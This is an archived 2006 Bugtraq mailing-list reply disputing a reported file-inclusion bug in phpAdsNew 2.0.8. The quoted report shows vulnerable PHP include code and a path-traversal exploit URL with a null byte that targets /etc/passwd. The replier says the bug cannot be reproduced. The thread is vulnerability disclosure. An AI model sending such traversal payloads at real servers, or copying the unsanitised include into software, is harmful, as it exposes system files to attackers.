[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-Id: <7.0.1.0.0.20061018034750.01bcb6d0@firstlinknetworks.com>
Date: Wed, 18 Oct 2006 03:49:35 +0200
From: Wim Godden <security@...stlinknetworks.com>
To: wacky@...ck.pl, bugtraq@...urityfocus.com
Subject: Re: phpAdsNew include bug!
I can't reproduce this on any of our phpAdsNew 2.0.8 installations.
As it should, the login prompt is presented.
Kind regards,
Wim
At 20:02 17/10/2006, wacky@...ck.pl wrote:
>#######################################
>Autors:
>- Michał `wacky` Błaszczak
>- Nobody
>
>http://iHACK.pl
>#######################################
>File: modules/phpads/admin/upgrade.php
>
>
>
>Code:
>
>// Load language strings
>if
>(file_exists("../language/".$phpAds_config['language']."/default.lang.php"))
>include("../language/".$phpAds_config['language']."/default.lang.php");
>else
>{
>$phpAds_config['language'] = 'english';
>include("../language/english/default.lang.php");
>}
>
>
>
>Exploit:
>
>http://ihack.pl/phpAdsNew-2.0.8/admin/
>upgrade.php?phpAds_config[language]=../../../etc/passwd%00
Powered by blists - more mailing lists